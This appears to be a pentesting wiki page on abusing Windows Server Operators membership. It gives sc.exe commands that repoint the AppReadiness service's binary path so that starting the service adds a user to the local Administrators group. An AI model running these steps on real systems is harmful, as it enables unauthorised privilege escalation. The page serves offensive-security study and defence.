Server Operators

ABOUT

Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

As example we would use AppReadiness service because it has high privileges and starts as SYSTEM. But method could be used against other services too.

Querying the Service

C:\> sc.exe qc AppReadiness

Checking Service Permissions with PsService

C:\> c:\Tools\PsService.exe security AppReadiness

Modifying the Service Binary Path

C:\> sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators ven17 /add"

C:\> sc.exe start AppReadiness

Confirming Local Admin Group Membership

C:\> net localgroup Administrators

PreviousBackup Operators NextPrint Operators

Last updated 9 months ago

hashtagABOUT

hashtagQuerying the Service

hashtagChecking Service Permissions with PsService

hashtagModifying the Service Binary Path

hashtagConfirming Local Admin Group Membership

ABOUT

Querying the Service

Checking Service Permissions with PsService

Modifying the Service Binary Path

Confirming Local Admin Group Membership